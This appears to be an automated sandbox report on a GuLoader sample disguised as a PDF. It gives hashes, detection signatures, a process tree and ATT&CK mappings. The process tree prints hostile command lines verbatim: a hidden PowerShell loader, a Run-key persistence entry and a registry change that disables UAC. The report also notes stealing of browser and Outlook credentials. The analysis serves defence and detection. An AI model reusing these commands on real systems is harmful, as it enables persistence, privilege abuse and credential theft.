Analysis

- max time kernel: 149s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 10-07-2024 08:39
Static task: static1

Behavioral task: behavioral1
- Sample: pko_trans_details_20240710_105339·pdf.exe
- Resource: win7-20240704-en

Behavioral task: behavioral2
- Sample: pko_trans_details_20240710_105339·pdf.exe
- Resource: win10v2004-20240709-en

Behavioral task: behavioral3
- Sample: $PLUGINSDIR/BgImage.dll
- Resource: win7-20240704-en

Behavioral task: behavioral4
- Sample: $PLUGINSDIR/BgImage.dll
- Resource: win10v2004-20240709-en

Behavioral task: behavioral5
- Sample: $PLUGINSDIR/UserInfo.dll
- Resource: win7-20240705-en

Behavioral task: behavioral6
- Sample: $PLUGINSDIR/UserInfo.dll
- Resource: win10v2004-20240709-en

Behavioral task: behavioral7
- Sample: $PLUGINSDIR/nsDialogs.dll
- Resource: win7-20240705-en

Behavioral task: behavioral8
- Sample: $PLUGINSDIR/nsDialogs.dll
- Resource: win10v2004-20240709-en
General

- Target: pko_trans_details_20240710_105339·pdf.exe
- Size: 477KB
- MD5: c601d5e720a191b1e304c8bcbf63b675
- SHA1: 80133fe77b17d44886e6201d7723be90489a55d2
- SHA256: d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
- SHA512: 2a78f640f01f365d23bb45bfc96e6900eb1814804bbf905876ac9d6e9353fd3e648efc08858b9e29e41eb6c2262e528d34b00d847524aeeabf41eb319792566f
- SSDEEP: 6144:39X0GFlllllllqllllllllllllhllllYllltlld0wz/ypzAJP8xvP2nWaLcAqRFk:R0Nwzy4EP2nWaPqzJgBKjYl92gCU3Bbl
Malware Config

Signatures

- Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.

- Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

- NirSoft MailPassView (1 IoCs)
  Password recovery tool for various email clients
  Processes:
  resource | yara_rule
  behavioral1/memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp | MailPassView

- NirSoft WebBrowserPassView (1 IoCs)
  Password recovery tool for various web browsers
  Processes:
  resource | yara_rule
  behavioral1/memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView

- Nirsoft (3 IoCs)
  Processes:
  resource | yara_rule
  behavioral1/memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
  behavioral1/memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp | Nirsoft
  behavioral1/memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft

- Blocklisted process makes network request (10 IoCs)
  Processes:
  flow | pid | process
  5 | 2284 | powershell.exe
  7 | 2284 | powershell.exe
  9 | 2284 | powershell.exe
  11 | 2284 | powershell.exe
  13 | 2284 | powershell.exe
  15 | 2284 | powershell.exe
  17 | 2284 | powershell.exe
  18 | 2284 | powershell.exe
  19 | 2284 | powershell.exe
  20 | 2284 | powershell.exe

- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide display window.

- Loads dropped DLL (4 IoCs)
  Processes:
  pid | process
  2444 | pko_trans_details_20240710_105339·pdf.exe (4 entries)

- Accesses Microsoft Outlook accounts (1 TTPs, 1 IoCs)
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | powershell.exe

- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" | reg.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes:
  pid | process
  2284 | powershell.exe (2 entries)

- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  Processes:
  pid | process
  2284 | powershell.exe

- Suspicious use of SetThreadContext (3 IoCs)
  Processes:
  description | pid | process | target process
  PID 2284 set thread context of 1776 | 2284 | powershell.exe | powershell.exe
  PID 2284 set thread context of 2336 | 2284 | powershell.exe | powershell.exe
  PID 2284 set thread context of 2216 | 2284 | powershell.exe | powershell.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Modifies registry key (1 TTPs, 2 IoCs)

- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes:
  pid | process
  2284 | powershell.exe (8 entries)
  1776 | powershell.exe (2 entries)

- Suspicious behavior: MapViewOfSection (3 IoCs)
  Processes:
  pid | process
  2284 | powershell.exe (3 entries)

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2284 | powershell.exe
  Token: SeDebugPrivilege | 2216 | powershell.exe

- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes:
  pid | process
  2284 | powershell.exe

- Suspicious use of WriteProcessMemory (35 IoCs)
  Processes:
  description | pid | process | target process
  PID 2444 wrote to memory of 2284 | 2444 | pko_trans_details_20240710_105339·pdf.exe | powershell.exe (4 entries)
  PID 2284 wrote to memory of 1884 | 2284 | powershell.exe | cmd.exe (4 entries)
  PID 1884 wrote to memory of 2876 | 1884 | cmd.exe | reg.exe (4 entries)
  PID 2284 wrote to memory of 1072 | 2284 | powershell.exe | cmd.exe (4 entries)
  PID 1072 wrote to memory of 1496 | 1072 | cmd.exe | reg.exe (4 entries)
  PID 2284 wrote to memory of 1776 | 2284 | powershell.exe | powershell.exe (5 entries)
  PID 2284 wrote to memory of 2336 | 2284 | powershell.exe | powershell.exe (5 entries)
  PID 2284 wrote to memory of 2216 | 2284 | powershell.exe | powershell.exe (5 entries)
Processes

- [1] C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  PID: 2444

  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    PID: 2284

    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
      Signatures: Suspicious use of WriteProcessMemory
      PID: 1884

      - [4] C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
        Signatures: Adds Run key to start application; Modifies registry key
        PID: 2876

    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      Signatures: Suspicious use of WriteProcessMemory
      PID: 1072

      - [4] C:\Windows\SysWOW64\reg.exe
        Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        Signatures: UAC bypass; Modifies registry key
        PID: 1496

    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"
      Signatures: Suspicious behavior: EnumeratesProcesses
      PID: 1776

    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"
      Signatures: Accesses Microsoft Outlook accounts
      PID: 2336

    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"
      Signatures: Suspicious use of AdjustPrivilegeToken
      PID: 2216
Network
MITRE ATT&CK Enterprise v15

- Privilege Escalation
  - Abuse Elevation Control Mechanism (1)
    - Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
Downloads